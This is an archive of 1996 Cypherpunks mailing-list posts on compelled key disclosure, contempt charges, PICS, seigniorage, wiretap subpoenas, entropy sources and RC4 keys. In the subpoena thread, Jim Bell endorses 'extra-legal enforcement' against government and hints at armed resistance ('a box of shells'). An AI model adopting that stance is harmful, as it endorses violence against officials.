Subject: Re:  "Contempt" charges likely to increase
Message-ID: <199604060105.RAA20223@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I think Tim has hit the nail right on the head with this one.

I have been quite appalled to read the various analyses on the net (URLs
not handy, but they have been posted here before I think) which conclude
that compelled disclosure of a cryptographic pass phrase would probably
be OK despite the Fifth Amendment.  This seems to be an area where there
is widespread agreement based on recent precedent.

In the past, when crypto was not widely used, the issue didn't really
come up very often.  If a criminal chose to write incriminating
information diary or financial ledger, and it could be found in a
search, then it was used as evidence against him.  At one time not even
this was accepted but it has been this way for many decades.

But crypto, if it becomes widely and routinely used, raises the bizarre
spectacle of criminals commonly being forced to produce information
which will then be used against them!  Imagine if they'd found a file by
OJ on his computer, encrypted, which he refused to decrypt.  The judge
could actually jail him for contempt until he revealed the password.
This could become a routine occurance in many kinds of crimes which rely
on private records as evidence.

Currently, I don't think the subpoena power is widely used in criminal
cases.  Rather, the prosecution relies on search warrants and the element
of surprise to prevent the destruction of incriminating records.  I think
there is recognition that in practice subpoenas would not be effective,
that the records would not be produced, even if contempt charges were the
result.

If so, then probably the tactic will not be that effective in forcing
people to reveal cryptographic keys.  Maybe if the jails start filling up
with defendants who refuse to go along with such order, judges will
decide that effective secrecy of records is now the new status quo.  The
law will then once again extend the Fifth Amendment privileges to
personal papers.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 6 Apr 1996 18:15:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Was Cohen the first?
In-Reply-To: <ad8abb671e021004df37@[205.199.118.202]>
Message-ID: <199604052236.RAA05091@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Having said this, Fred Cohen deserves credit for seriously studying
> properties of replicating programs, including viruses. (And I believe he
> coined the term virus, and also showed how it differs from a worm.)

Fred Cohen did not coin the term. "The Shockwave Rider" explicitly
refers to viruses in addition to worms -- indeed, the main character
at several points uses a "phage" (i.e. a virus) to eliminate
information about himself from the global communications
network. Other people used the term "virus" in a number of similar
contexts long before Fred Cohen.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave.hodgins@westonia.com (DAVE HODGINS)
Date: Sat, 6 Apr 1996 15:05:47 +0800
To: cypherpunks@toad.com
Subject: MPI10.ZIP RELEASED
Message-ID: <8BE1440.0001012D96.uuout@westonia.com>
MIME-Version: 1.0
Content-Type: text/plain



 ÛßßßßßßßßÛ  Original From: DAVE HODGINS
 Û CARBON Û             To: ALL
 Û  COPY  Û    Date/Number: 04/05/96 - Not Yet Posted
 ÛÜÜÜÜÜÜÜÜÛ             On: WESTONIA - 2513 - Public-Key Encryption and Distribution Echo
-----------------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----

  I've written an interface for dos based mail programs and pgp.  The
interface provides menu selection for various pgp functions likely to
be used when writing email, and selection of keys to be used, from a
list of the keys in your keyring.  The program is similar in function
to John Schofield's ez-pgp.  The program has been tested under win95,
and dos 6.22.

  I'm uploading the file to the westonia bbs, and will email a copy to
anyone who requests it.

  Regards, Dave Hodgins.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMWWnkIs+asmeZwNpAQGyEwf/YGWfkuWVcEzISpnin3z24WJyqzq0e48B
VZihLsKsdJ+BL+VNvBoejvpIxEZM2dq2VyycrKFks7TK8HSjUlcCiv4prSGUQqsB
K1PKdJPpUyT6f1EHdHz3UllBeIGjR8mjgmGRV86ezUC+Y2lHmWvqlWT1YlHPwIwp
1LnQL9aIzFkz1WaFvzC9O19dzKqT+FMIMS2QtVarHCcbWlmWYwgRuPihNngciXKs
tKChLjeh88/DlItGm8dhu2iPoGzb4LpPDBuUrJZB5hPxaBJjdgugiNE/CY+Z9Fhj
E02Ji2ZraFrXi6nOCCNnIq97PHf/aZlDn9CrSZyOLBkO2hx7WXdUnQ==
=8osk
-----END PGP SIGNATURE-----


cc: ALL in 5711 on WESTONIA
    CYPHERPUNKS@TOAD.COM in 0001 on WESTONIA

---
 þ RM 1.31 0820 þ Internet:Dave.Hodgins@Westonia.com Rime->1347 Fido 1:250/636




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 6 Apr 1996 15:46:35 +0800
To: cypherpunks@toad.com
Subject: PICS required by law
Message-ID: <01I36YAYMC3K8ZE63H@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	What was I saying a while back about mandatory PICS through liability?
As I recall, various people such as TCMay were saying that it wouldn't happen.
Looks like I need to get out that article against PICS that I was working on
and rewrite it a bit. I would remind people that PICS allows parents (or
whoever else is holding the reins, such as an ISP - or the Chinese firewall) to
filter on such content as material (including scientific studies) stating that
a given illegal drug is not as harmful as some would claim, any idea futures
market - even a simulated one, on homosexual content separately from
heterosexual, and against criticisms of religions (such as Scientology). To
their credit, the ACLU (in the CDA court case) has stated that they will not
put a PICS rating on their web site, even if it contains "indecent" or
allegedly "harmful to minors" material. I agree strongly with their position.
	-Allen

Computer underground Digest    Wed  Mar 27, 1996   Volume 8 : Issue 25
                           ISSN  1004-042X

[...]

Date: Thu, 14 Mar 1996 11:47:33 -0800
From: telstar@WIRED.COM(--Todd Lappin-->)
Subject: File 1--CONGRESS: Online Parental Control Act of 1996

[...]

        Maintains the Communications Act of 1934's legal defenses
against liability for people who choose to give parents technology that: 1)
blocks or restricts access to online materials deemed obscene or harmful
to minors, and 2) restricts access to such materials through adult access
codes or credit card numbers;
        Adds two new defenses: 1) the use of labeling or segregating
systems to restrict access to online materials, such as systems
developed using the standards designed by the Platform for Internet
Content Selection project (PICS), and 2) the use of other systems that
serve the same function of the other defenses if they are as reasonable,
effective, and appropriate as blocking, adult access code, and labeling
technologies; and
        Protects providers or users of interactive computer services,
information content providers, and access software providers from civil
or criminal liability under state law for making available to minors materials
that are indecent or harmful to minors if they take actions to qualify for
the defenses mentioned above.

[...]

PICS is a cross-industry working group assembled under the auspices of
MIT's World Wide Web Consortium to develop an easy-to-use content
labeling and selection platform that empowers people worldwide to
selectively control online content they receive through personal
computers.  The Recreational Software Advisory Council recently
announced that it will soon implement a detailed voluntary ratings system,
using PICS standards, that will let computer users filter out varying
degrees of sex, violence, nudity, and foul language.  Companies and
groups supporting PICS include Apple, America Online, AT&T, the Center
for Democracy and Technology, CompuServe, IBM, France Telecom,
Prodigy, Providence Systems/Parental Guidance, Surf Watch Software,
and Time Warner Pathfinder.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: robalo <robalo@elogica.com.br>
Date: Sat, 6 Apr 1996 15:35:31 +0800
To: cypherpunks@toad.com
Subject: unsubscrive
Message-ID: <31659CFA.132F@elogica.com.br>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive * robalo@elogica.com.br
 unsubscrive * robalo@elogica.com.br
 unsubscrive * robalo@elogica.com.br




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 6 Apr 1996 15:44:35 +0800
To: James Gleick <gleick@around.com>
Subject: Re: e$ Signorage
In-Reply-To: <1.5.4b13.32.19960404143637.006a92b8@pop3.interramp.com>
Message-ID: <199604060044.TAA05367@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



James Gleick writes:
> >I believe money which is never redeemed back at the bank is called
> >signorage in the currency biz.  Whatever signorage *actually* is, Kawika
> >Daquio of the ABA (B for "Banking"), the Fed makes $20 billion a year on
> >it. Not much against a trillion dollar federal budget, but, hey, every
> >little bit helps...
> 
> Seigniorage is actually the Government's interest income on all the
> currency in circulation.

Seignorage is neither of these things. It is the difference between
the cost of producing a currency token (like a quarter or a dollar
bill) and the face value of the token. In essense, its the profit
margin on printing or minting money.

> It's not obvious, but it's true, that the Fed collects the "float"
> on dollar bills you carry in your pocket,

Oh, really? From whom? First I've heard of this.

Now, it is indeed true that the Fed holds large numbers of government
bonds and theoretically earns interest on them, and that banks in a
free banking system do indeed loan out the money that backs their
notes. However, the fed has no mechanism to earn interest on dollar
bills, nor, in fact, does it need to.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Apr 1996 16:58:53 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <ad8b1bc71f02100483ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 PM 4/5/96, Bill Frantz wrote:
>At 11:57 AM 4/5/96 -0800, Timothy C. May wrote:
>
>>If the secrets or assets _cannot_ be retrieved--a scenario which is
>>possible, if the protocol is so written (clauses for court action)--then
>>contempt charges are meaningless and would not stand, IMNALO.
>
>The Black Unicorn indicates that if the reason the secrets _cannot_ be
>retrieved is because they are in a jurisdiction which refuses to reveal
>them when the owner is under compulsion, the owner can still be punished
>for contempt (A contractual situation).

Far be it from me to question the legal advice BU/Uni/Dirsec provides, but
I think all contempt charges have a kind of eventual expiration. That is,
after some number of months or years have passed and it becomes apparent
the incarcerated person simply will not or cannot comply, release is
ordered. It has happened in most cases of reporters, and it happened with
Rebecca Morgan (who never did tell the court where her daughter was, though
it later came out that her daughter was probably in Australia with
grandparents).

Jail term for contempt of court has certain resemblances to trial by
ordeal: if after some period of time of ordeal one has not talked, the
ordeal is over.

If the court is shown that the protocol makes it impossible for the person
to retrieve the material, especially that there are no ways to circumvent
the contract, then the court may still jail the person for a while "just to
make sure" that there is no means of circumventing it. If and when it
becomes apparent to even the most skeptical that the material has been
lost, or is unretrievable, then I think the contempt jailing must end. When
nothing is served by furhter jailing, except punishment, then the reason
for the contempt action is ended. Or so it seems to me, from what I've
osmosed about the law.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Apr 1996 21:46:26 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u5Q3q-0008xlC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:49 AM 4/5/96 -0500, Black Unicorn wrote:
>On Thu, 4 Apr 1996, jim bell wrote:

>> I really don't think you're giving me enough credit.  I am fully aware that 
>> in the past, the organizations on which wire-tap-type subpoenas were served 
>> (primarily AT+T, "The phone company") were very cooperative with the police 
>> and probably "never" challenged the subpoena. There is the law, and there 
is 
>> the usual reaction to that law, and I expect that much of Unicorn's 
position 
>> is based on a (false) assumption that this reaction will necessarily 
>> continue unchanged.
>
>Now, if this is your postion, let's see some support.

You do the research.  Until 1968, Federal wiretaps were illegal, by the 
Federal communications Act of 1934.

>From Encyclopedia Brittanica, 1970, vol 23 page 592:

"The modern federal law of wiretapping begins with the case of Olmstead v. 
U.S., 277 U.S. 438 (1928).  A majority of the Supreme Court, over vigorous 
dissent, held that a defendant's rights against unreasonable search and 
siezure, protected by the Fourth Amendment of the U.S. Constitution, were 
not denied by the tapping of his telephone wires by federal police 
officials.  In denying constitutional protection to the privacy of 
telephonic communicatiosn, the Olmstead decision in effect delegated to 
Congress the responsibility for defining what restrains, if any, are to be 
imposed on wiretapping activiity.   In 1934, Congress enacted section 605 of 
the Federaol Communications ACt, whcih provides, in part: "no person not 
being authorized by the sender shall intercept any communication and 
divulte...the contents..of such intercepted communication to any person."

Brittanica continued:

"It is clear that federal police officers continue to engage in wiretapping 
despite the statute.  The position of the Department of Justice has been 
that section 605 does not forbid wiretapping per se, but only interception 
_and_ divulgence.  Moreover, it is assered, communication of the contents of 
an intercepted message by one federal police officer to another is not 
'divulgence' within the meaning of the act.  This interpretation has never 
received definitive judicial approval.  Since the late 1930's numerous 
unsuccessful attempts have been made to amend the provisions of section 605, 
usually with the purpose of broadening various law-enforcement uses of 
wiretapping."

[end of Brittanica quote]

Needless to say, I find these excuses and distinctions silly and 
self-serving.  If Congress really had the power to increase the usage of 
wiretapping and numerous times chose not to do it, it is reasonable to 
assume that no legitimate interpretation of the Act of 1934 could allow 
police wiretapping to occur.


It is reasonable to assume that most wiretaps, when they were done, were 
assisted by the local phone company (usually AT+T).  In other words, AT+T 
assisted the government in illegal actions.   What happened in 1968 
was that Congress, recognizing this situation, decided to "compromise":  
They declared those wiretaps legal, if a warrant was obtained, and and a sop 
to the cops they allowed that evidence into court.  But them's the details.  
The fundamental point is that if AT+T would engage in illegal activity to 
benefit the cops or Feds, they would certainly go less far to give the 
government what it wants, whether or not that was illegal.  Clearly this was 
(and is) a non-arm's length relationship.

And notice that there was apparently no way for the police to force AT+T to 
do those wiretaps, before 1968.  They couldn't use them, so they couldn't 
insist on them.  You'll have to explain why AT+T did what they did even 
though they were apparently not obligated to act, and there was NOTHING the 
Feds could have done (legally, anyway!) to force them to.

>Compelled discovery orders work because they are backed with the 
>very credible threat of financial and custodial sanctions.  Obstruction, 
>or conspiracy is a crime, and in the case of the FBI, a federal crime of 
>some magnitude.

As usual, you misrepresent the situation.  You're setting up a straw man.  
"Appeals" are not "obstruction."

>While some ISP's may indeed feel they are able to resist the whims and 
>enforcement powers of the United States, they are likely to be offshore, 
>small, and viewing themselves as out of the reach of U.S. jurisdiction.

You continue to build that straw man.  

And I notice that you said "whims"?  What did you mean by this?  Are you 
suggesting that there is something wrong or illegal with "resisting the 
whims" of the government if that government has no legal basis for 
compelling cooperation with those "whims"?  I think it's interesting that 
with each paragraph you set little traps for yourself, and fall into them so 
embarrassingly.  
  
>With the scope of U.S. jurisdiction for compelled discovery, however, 
>I think that most ISP's will find themselves in for significant surprises.

There you tried to knock him down.

>Mr. Bell somehow assumes that smaller ISP's will be less vulnerable.  I 
>believe this in error.  Smaller ISP's won't even have the financial 
>wherewithall to fight a compelled discovery order properly, much less 
>actualy prevail in court

Think "insurance companies."  Insurance companies exist to pool risk.  At 
some point, "subpoena insurance" will be recognized as being a valuable 
thing, because it will allow even the smallest ISP the full legal assistance 
necessary.  A side-benefit of such assistance is that the government won't 
be able to "defendant shop" and try to set up a comfy precedent, because 
even the smallest ISP will be able to fight back as if it were large.  This 
is important to all other ISP's, obviously.  That's why they'll happily pool 
their resources.

>where it is firmly estlablished that compelled 
>discovery orders will be enforced and enforced with vigor, and that 
>judicial review will be a waste of time.

Continuing to knock down that straw man, I see!

>It is worth bearing in mind that subpoenas are not the only tool that 
>authorities can use to affect compliance.  In many cases authorities 
>simply seize the equipment and hold it for the statuatory period before 
>which  they are required to file charges in.  The Ripco BBS in Chicago, 
>victim of the Sun Devil raids, is a prime example.  In that case the 
>equipment was seized (via sealed warrant which later proved to authorize 
>seizure of "computer or other electronic equipment of any nature."  and in 
>actuality resulted in the seizure of everything from disks to printers 
>to telephones), and held for five years before finally being returned.  
>Clearly it was obsolete by this time.  No charges have been filed.

What I repeatedly find amazing about Unicorn's commentary is that he lists 
actions and behaviors of government that most of the rest of us find 
disgusting or egregious, and then he seems to take the position that it is 
impossible to prevail in court against those actions.  

Even if that limited opinion were true, to the extent it's true that merely 
goes to show why we can't expect justice from courts, and why we're going to 
have to set up a system to ensure that these egregious actions get punished.


>While I'm sure Mr. Bell would sacrifice hardware, freedom, cash, (though 
>I'm sure he would insist on representing himself), and time to fight the 
>tyrany of the FBI, I don't see every ISP suddenly turning into a Montana 
>freemen armed standoff with the authorities, which is what it would 
>practically take to resist such warrants and exercise of authority, even 
>by preemptive or malicious encryption or disposal of data.

Actually, it only takes one to set a precedent hostile to the government.

>> Besides, that phone company had a monopoly, so it wasn't possible for 
>> citizens to shop around for a phoneco that was known to make it hard for 
>> police.  But that's changing, and that's my point.  Now and in the future, 
>> it's going to be harder and harder for the police to get a 
>> bend-over-backwards level of cooperation, and in fact phonecos (and 
>> especially ISP's) might reasonably want to build up a reputation that they 
>> will defend a customer's security in court long before a wiretap is 
>> installed.
>
>In practice many ISP's or phone co's will not have the opportunity to 
>defend the matter in court without their services and equipment being 
>forcibly seized preemptively.

Oh, really?  Do you realize what you've just admitted?  You're your own 
worst enemy.  Let me quote you something you said below:

>There are ways to resist compelled discovery.  These are not they.

Sounds like a big contradiction, right?  You can't even keep your story 
straight!  Your loyalty to the truth is nil.  Yet another trap you set for yourself.  

>> Imaginative phonecos will find ways to inform the target 
>> legally, including naming the target as a non-hostile defendant in a court 
>> challenge to that wiretap, and noticing that target since he's now a party 
>> to a court action that must be noticed under civil procedure rules.
>
>So the ISP sues their client to notify them of the wiretap?  Or the ISP 
>sues the FBI and then draws the client into the suit?  I'm not sure what 
>you mean here. 

Your cluelessness is legendary.  Go talk to a real lawyer and he might tell 
you that occasionally, entities must be brought into lawsuits if their 
interests are at stake and their participation is necessary to decide an 
existing case.  It happens all the time.  In this kind of case, a challenge 
to the wiretap inherently involves the interests of the person to be tapped, 
and thus his participation is logical.  Not that the cops would LIKE it, but 
that doesn't necessarily mean that it won't happen anyway.

>In any event it's a totally meaningless point as ongoing 
>investigations could easily be blinded and the ISP or telco charged with 
>willful obstruction

Naming the target as a non-hostile defendant is not illegal.  Noticing him 
under civil procedure rules is not illegal.  Etc.

 or conspiracy to destroy material evidence to a 
>crime, accessory after the fact in effect.

You keep harping on this "destroy material evidence" kick.  Is that the best 
you can do?  I said NOTHING about "destroying evidence."  (regular readers 
will notice that this is a pattern that Unicorn displays; typical straw-man 
behavior!  His "destroying evidence" tirades are old.)
>
>> In short, there is a drastic difference between blind obeisance and 
>> enthusiastic hostility, even if you exclude actions by the ISP or phoneco 
>> that would rise to the level of some crime.
>
>What you have described is a crime.  Your "clever" lawsuit isn't going to 
>fool any judge, or anyone else.

There is a big difference between "not fooling the judge" and becoming a 
crime.  As I pointed out before, these are exactly the kinds of issues that 
have "never" been enthusiastically challenged by an ISP or telco.  Your 
assumption that such challenges will never happen, or will fail is touching.

>> My point in the first paragraph that I am quoted in above is 
>> that many of the challenges that have never been made against wiretap 
>> subpoenas, due to a closer-than-arms-length relationship between the 
phoneco 
>> and the government, _will_ be challenged.
>
>This argument relies heavily on the absence of other persuasion to comply 
>with wiretaps, which, as I have demonstrated, exist in abundance.  Thus the 
>thing falls in upon itself.

The error you just made is to confuse the issue of adjudication and 
enforcement.  All you just said was that, once the final decision is made, 
it can be enforced.  I don't think it's necessary for me to challenge that 
claim, for the purposes of my point.  My point is that challenges to 
subpoenas can and do occur, WHEN THE PERSON OR CORPORATION NAMED _wants_ to 
do them, and up until now that organization regularly failed to do so.

>> will be challenged on (among other things) the basis of 
>> the fact that this precedent was formulated during an era when essentially 
>> all telecommunications was monopolized and regulated, and there is no 
reason 
>> to believe that a previous telecom monopoly would have been diligent at 
>> protecting the rights of their captive customers against the interest of 
the 
>> government at that time.
>
>You're claiming that a court is going to distinguish the case where a 
>small ISP/telco refuses to comply with a compelled discovery order from a 
>case where a large telco typically complies with a discovery on the basis 
>that the large company complies only under compulsion or in self interest?
>
>This amounts to "A obeys the law because he wants to.  B doesn't want to 
>obey the law, therefore B need not."

Further "straw-man" behavior. You just misrepresented the issue.  I'll 
re-write it:

"A obeys not only the law without question, but also agrees with all 
requests even if they are beyond the legal scope of the subpoena, and 
generously helps the cops, challenging nothing.  B challenges everything, 
and uses 'every trick in the book' to eliminate or minimize his obligations 
under the law"

There, that's better.


>> I think we need to start challenging all the previously-assumed issues that 
>> have been interpretated to benefit the government.  If my ISP has agreed, 
>> for instance, to send me daily certifications that he hasn't received any 
>> "official" inquiries about my account, and one day he receives such an 
>> inquiry and is forced to install some sort of a tap, it is hard for me to 
>> imagine what kind of legal precedent would allow (and, even, REQUIRE) him 
to 
>> continue to send false certifications when the alternative, simply failing 
>> to send any certifications whatever, is also "legal."
>
>As I have tried to explain to Mr. Bell before, the days of legal 
>formalism are over.  Substance over form prevails today. 

What, exactly, does this mean?  Are you saying, "The Constitution is dead"?  
Are you implicitly acknowledging here that my points are, or at least, WERE 
valid under a previous interpretation of the Constitution?  What, exactly, 
happened to change this?  Who passed which law to change it?

>The substance 
>of this transaction is to inform the client that an investigation is 
>ongoing.  This is a major no-no, whatever Mr. Bell thinks he knows.

"major no-no"?    It sure is interesting how Unicorn uses thes high-falutin 
legal terms like "major no-no" to describe the intricacies of subpoena law.

I'm going to have to look in Black's to figure out the legal implications of 
"major no-no." 

>> (and, in fact, may be 
>> required under my contract with him, should he be obligated to do a tap or 
>> know one exists.)
>
>As I explained before, contracts are void to the extent they are 
>illegal. 

Unicorn proves, once again, that a little knowledge is a dangerous thing.

But I don't think that FAILING to send a particular certification (that the 
ISP isn't under subpoena) constitutes an "illegal" contract.  The 
fulfillment of that term is not legally required, absent a contract, and 
likewise it is not generally prohibited if it is part of a contract.  It 
looks like the government has no basis to object to either sending that 
certification or failing to.

 And you also misrepresented things:  it is more accurate to use the term 
"unenforceable" rather than "void".  "Unenforceable" (assuming, for a 
moment, that this was a correct interpretation; it isn't, however) might 
simply indicate that the client can't sue his ISP for lack of fidelity to 
that particular term of the contract.  But that's somewhat misleading, 
because this assumes that the ISP _doesn't_ want to comply with the terms of 
his contract.  It is irrelevant that a contract is argued to be 
"unenforceable" if the parties to the contract _want_ to comply with it 
anyway.  And if the ISP _wants_ to comply, and compliance merely involves 
FAILING to send a certification, and not sending that certification is not 
otherwise prohibited by pre-existing law, then I think it's obvious that the 
ISP is entitled to fail to send the certification.

In a government-centric philosophy enthusiastically promoted by Unicorn, 
government is the only enforcer.  In the real, digital world of the future, 
digital reputations will enforce behavior.  A practice by an ISP to tolerate 
subpoenas without legal challenge will become well-known, and that ISP will 
shrink to oblivion unless he changes his policies.

>Mr. Bell's response?  "Well, then we'll kill him and enforce 
>the contract that way."

Given the repeated admissions you make that the government can and does 
engage in outrageous behavior, I'd say that extra-legal enforcement is 
clearly warranted.

>> The fact that I'd likely interpret his failure to send those 
>> messages as meaning that my access is tapped is not within his control, and 
>> if he's unwilling to screw me I find it hard to believe that he can't act 
on 
>> this fact even if those actions have an indirect effect of alerting me.  
>
>Your use of the word "indirect" is stretching the bounds of the 
>imagination.  A judge, unless sleeping through argument, would see 
>through this like glass.

Again, doesn't make it illegal.  There is no reason to assume that the 
government will always get whatever it wants. (remember the "whim" reference 
you made above?  I'm _still_ laughing about it!)   Challenging it on what it 
wants should be standard procedure.

>> These are the kinds of issues that have either rarely or never been 
>> challenged in court, simply because the organization(s) that would normally 
>> do those challenges was in the hip pocket of government.  It's going to be a 
>> brave new world very soon.
>
>Incorrect.  They have been challenged time and time again in the context 
>of compelled discovery.  Time and time again compelled discovery has been 
>required, TRO's forbidding the destruction of documents and other 
>evidence issued, search warrants and seizure effected in place of subpoena.

For a different class of people and corporations, yes.    Not ISP's, and as 
far as I know, telephone companies have never pushed the envelope.  If you 
have any specific contrary examples, show me.


>The telco in past has not complied with such orders because of some grand 
>government conspiracy, 

You statement is wildly in error.  AT+T clearly did phone taps for the 
government prior to 1968 PRECISELY due to "some grant conspiracy":  It 
certainly didn't do them because AT+T was _legally_obligated_ to.

>although I realized Mr. Bell finds such things 
>immensely sexy.  It has complied because its officers faced criminal and 
>financial sanctions for non-compliance.

Which is an interesting statement, given the fact that I pointed out that in 
the period of 1930-1968, the phone company assisted with ILLEGAL wiretaps.  
Are you suggesting that during that time frame, they actually violated the 
law under threat of "criminal and financial sanctions for non-compliance"?  
What kind of government threatens people with "criminal and financial 
sanctions" for NOT assisting it with illegality?  

Yikes!  Somehow I think your morality is about as warped as it comes.  Yet 
another trap you set for yourself, and you jumped right in.

>
>There are ways to resist compelled discovery.  These are not they.

What you haven't explained or demonstrated is how ISPs could become more 
agressive in their defenses.  This failure is typical of you:  Your bag of 
tricks is empty _unless_you_are_paid_.

Jim Bell

jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 6 Apr 1996 16:59:05 +0800
To: cypherpunks@toad.com
Subject: Spinners and compression functions
Message-ID: <960405210713_185610686@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Since there has been a lot of discussion about spinners derived from various
things (idle loops, video retrace, etc.) used as entropy sources, here is yet
another idea.  Run the spinner output through a PKZip type compression
function, and then seed a PRNG with the output from that.  This would provide
a means of gauging the amount of entropy that has been fed into the PRNG,
(count the bytes output from the compression function) which will allow the
program to disallow any output from the PRNG until a sufficient amount of
entropy has been fed into it.  Even if there are correlations in the spinner
data, (I know, that is obvious) by the time it has gone through the
compression function and the PRNG, it should be cryptographically useful,
especially if entropy from multiple sources (keyboard & mouse events, disk
access times, network access times, etc.) is used to seed the same PRNG.

Jonathan Wienke

Political Rant:
Re: e$ Signorage
>And there I was thinking it was the right for Greenspan to sleep with any 
>unmarried woman on the eve of her wedding...

Actually, that's "prima nocte" (Latin for 'bimbo eruptions" [:)] ) and the
principal beneficiary is our beloved President...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Apr 1996 18:49:33 +0800
To: Black Unicorn <sameer@c2.org
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u5QH8-00090aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 PM 4/5/96 -0500, Black Unicorn wrote:
>On Fri, 5 Apr 1996 sameer@c2.org wrote:
>
>> 	What's the point here, or is Unicorn just having fun
>> lambasting Jim Bell?
>> 
>> 	My basic attitude, running an internet privacy provider, is if
>> Mr. Govt. wants my data, and gives me a court order (subpoena,
>> "compelled discovery", whatever), then I'll give it to 'em.
>> 	If my customers that they were looking for had any brains at
>> all, a court order, compelled discover, whatever, will not help
>> Mr. Govt. That's the cornerstone of my security model.
>> 
>> 	Or am I confused about what you are talking about here.
>
>Yours seems to be about the most aggressive policy a ISP provider can 
>take and expect to remain in business.

This is a classic defeatist attitude, the one that Unicorn specializes in.  
He wants us to believe that there is literally NOTHING that anyone can 
possibly do to solve the "government problem."

I contend that had he talked to Phillip Zimmermann in 1990 or so, he would 
have told Zimmermann that "It's illegal to write an encryption program using 
RSA, because it's patented!  You'll never get away with it!"

But history records that Zimmermann _did_, and he "got away with it."

What I'm advocating is that people do what Zimmermann did: Write programs 
that will extend the usages of encryption to thwart attempts to retrieve 
data by its owners, whether or not the data is on the owner's system.

>That is, resist by what legal means are available, but ultimately depend 
>on the user to secure his or her own data.

Notice that Unicorn never gives useful specific suggestions about which 
"legal means are available."


>Where I differ with Mr. Bell is that he seems to think the ISPs of the 
>world are going to rise and unite to quash the oppressive hand of big 
>government at their own expense in order to satisify some sense of 
>personal ethics or customer goodwill.

Cumulatively, they could do exactly this.  Spread among most ISP's, the cost 
per ISP could be quite low.  Augmented with my AsPol idea, the costs would 
be even lower.  What was that quote?  "A box of shells is cheaper than an 
appeal."

Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Apr 1996 18:41:37 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u5QPq-0008xyC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 PM 4/5/96 -0800, sameer@c2.org wrote:
>> Where I differ with Mr. Bell is that he seems to think the ISPs of the 
>> world are going to rise and unite to quash the oppressive hand of big 
>> government at their own expense in order to satisify some sense of 
>> personal ethics or customer goodwill.
>> 
>
>	I urge Mr. Bell to start a business of his own with that
>model, and see how much fun he has. (Or, worded differently, how long
>it takes for him to go bankrupt. Perhaps we can setup betting
>pools. That could be fun.)

By now, you've probably seen my comment to Unicorn, that ISP's could easily 
pool their resources, in a form of insurance, to guarantee that any test 
case will be fully litigated to ensure that a bad precedent isn't set.  What 
if it cost a million dollars?  That's only about 5 cents per American 
Internet user.

You were saying about "going bankrupt"?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 6 Apr 1996 18:50:10 +0800
To: Jack Mott <cypherpunks@toad.com
Subject: Re: RC4 improvement idea
Message-ID: <199604060539.VAA22611@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 4/5/96 -0500, Jack Mott wrote:
>I got a paper from the cryptography technical report server  
>"http://www.itribe.net/CTRS/" about a weak class of RC4 keys.  The 
>report said that with some keys, it was possible to predict what some 
>parts of the State-Box would be. 

The report was bogus:

For one key in 256, you can tell what eight bits of the state box are.  
For one key in 64000 you can tell what sixteen bits of the state box are, 
and so on and so forth.

Such keys are not weak.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Apr 1996 17:31:56 +0800
To: cypherpunks@toad.com
Subject: Re: e$ Signorage
Message-ID: <199604060252.VAA22047@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Perry is closest to Webster's Third New International
   Dictionary:

   -----

   seigniorage or seignorage also seigneurage

